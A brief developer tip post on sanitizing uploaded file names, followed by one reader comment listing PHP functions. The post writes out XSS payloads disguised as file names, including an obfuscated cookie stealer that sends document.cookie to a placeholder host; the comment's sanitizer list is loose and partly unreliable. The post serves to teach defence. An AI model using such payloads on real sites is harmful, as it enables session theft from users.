Last Updated: June 11, 2021
· nmalcolm

Web Security: File Names

One important thing to remember when it comes to developing web applications is you can never trust any of your users in any case. Humans are cruel; it's not unlikely someone will try to crawl their way in to your server or database.

When developing attachment, file upload, or similar systems, always remember to sanitize the file name.

Of course modern computer systems don't allow slashes in the file name so the following wouldn't work:


Systems just don't like that. You cannot use slashes in file names. But a specially crafted file can be uploaded which could be used to steal cookies, redirect users, or modify the current page to the attacker's liking.


// Simple alert
<body onload=alert(Hacked)>.txt

// Cookie stealer
<body onload=location.href="http:"+String.fromCharCode(47)+String.fromCharCode(47)+"localhost"+String.fromCharCode(47)+"test.php?data="+escape(document.cookie)>.txt

// etc

<em>ALWAYS</em> sanitize the file name. Keep yourself and your users safe. :)

1 Response
Add your response

I Couldn't agree more with you, I wish I had mentioned this in my Pro Tip about sanitizing variables.

The only one thing I can add is HOW:

a) htmlspecialchars()
b) striptags()

c) stripslashes() / addslashes()
d) mysql
e) htmlentities()
And to be honest, hundreds of more methods of sanitizing data.

Awesome post.

over 1 year ago ·